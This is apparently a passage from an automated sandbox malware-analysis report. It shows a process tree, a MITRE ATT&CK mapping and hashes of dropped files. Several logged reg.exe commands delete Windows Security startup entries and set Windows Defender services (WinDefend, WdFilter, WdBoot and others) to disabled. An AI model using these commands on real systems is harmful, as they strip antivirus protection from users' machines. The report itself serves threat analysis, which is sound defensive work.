C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
- System Location Discovery: System Language Discovery
PID:4756
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
- System Location Discovery: System Language Discovery
PID:1312
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
PID:3520
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
PID:4296
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
PID:1712
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1796
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1816
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2236
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1180
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:1444
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2280
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1808
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3924
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD50dad27303a240017cc59f8f9449431a0
SHA19f4909282b57dae3f98e542fa81765e404f0d616
SHA256b708b59337d06ae3998197926f0dd4180e4cd0b67e80ce005336fc1ddd6f08f9
SHA5126b9296862f5e9741b4621a739bc40cf5b87bbe39e293472be0787a5cc1d534880b1a272aaa550525441a5ebde7842515722911b5b0908fd802bfea4fdae05d7a
-
Filesize
152B
MD50a9dc42e4013fc47438e96d24beb8eff
SHA1806ab26d7eae031a58484188a7eb1adab06457fc
SHA25658d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
SHA512868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f
-
Filesize
152B
MD561cef8e38cd95bf003f5fdd1dc37dae1
SHA111f2f79ecb349344c143eea9a0fed41891a3467f
SHA256ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
SHA5126fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize144B
MD5acce8a28daf98f07f80c672d90bc322b
SHA1b901fbc0876088f44c175969a523f15260e9ccc8
SHA256686dcbffc82f819b35eee97b2773eba10208ea773014d98cb9d83d59eb5478a6
SHA512e85fcdaa661978feb907af61a4b27fda2eb0479d2ffa646b8bd20c0984b8ea51d8040edd55e4aebad7b4a54272a3e68ff46ed9d074c40c770c0450c6750ff97d
-
Filesize
391B
MD55c859d9288a60d235b3cad2c36ab5670
SHA1e51cad875defee4028accce6de5bde1b6ca94dc6
SHA2563f28f1593628cfb46518b9252683e3a8b0bfb921021be4c6ae413f114ccbb517
SHA51224c6cc4268ceff420cc3026217c35566680a05e584498278e7c479a03cf55f8461135c607a849600a117e1d59719e7eb6e289087575689556d90ca0a9671ea8e
-
Filesize
6KB
MD51179072a76810a60f538068ca45ce5f3
SHA183b4cc02e3cdd9686359ee9a886e716baba89131
SHA25605e46d717e8814c4244fd8c36cd494254880faa857c57669f202c951e2068078
SHA512de47b3d38889f5d02c634ced578902f9ea91c4cfb5278b5b5883d8ac2b59b71e2d74d3fccf4910feba01223ba40f9ba81deea54a7fb7aa3c84a9c24255251bd0
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\fb5e63bb-25b1-4eb8-a3a2-8dca77b2ddc9.tmp
Filesize5KB
MD5b09a32e425e22a8ac510de6df6e727e5
SHA17a263ebf900d06535b71b619ec06dfef94e8c4c7
SHA256f51a77ffb815b94b03260b86603b52463dc3c4abe335e03c7903fe8261581936
SHA512c9d883483d7dee12fb2812bd78231f57e63df81dbef8440a55c3c9d7ef9c68937451e5dba333f59d5aa478475542bea8a62773545474e26d65bd5adc04c7cf48
-
Filesize
10KB
MD5c456f0d5a1df482235007e668ea1bd52
SHA16026202f328e9b9b77a94bd9b6703d016ee8642f
SHA25619534c091e134a2fdcc1688b51ea38e027b294ecbf44bcab433fb012be39ec28
SHA512912140e53746271d42be817c82b4053a869272b568b53522e846f9c417b9ad93e0eb3f75a18e20bdef13a92920d5b86b4f40c08e5929639e1f8c16e8619adc19
-
Filesize
3KB
MD510e9d7377b7fd4df43145ae4c8b136b3
SHA14002ba143ff336f631d36c6afd93464822ba541e
SHA2561b1b51dbe669925f941f0b3e04c7d00f29af6746179a7b72a58391720cd23da1
SHA512c28b439ab8fdc3e8da7217250b5f13be1613b0acf5677758d65fe7e46f0abdea08db73ecce5ca38fb88c8c25064fddc04e1f23d4d70058d27a0ba23a980fe885
-
Filesize
203KB
MD5b8fb078ab0ff9ca107d79112a1a56255
SHA1cebcb36d55bb63688bd9ffbf7d372ba41b0e959e
SHA2562d73aa44284a435c2cc78b6a80a4326f42a28dfa598e5dfd20ba3f612afdcd37
SHA5121a817eb1043122eb183821558cd9541f4a34f76551f52040f8c2e3caf8dd082a88d80799be868bbb84fdf339cb462a63bb14bceae869345485b565a19d01f1f9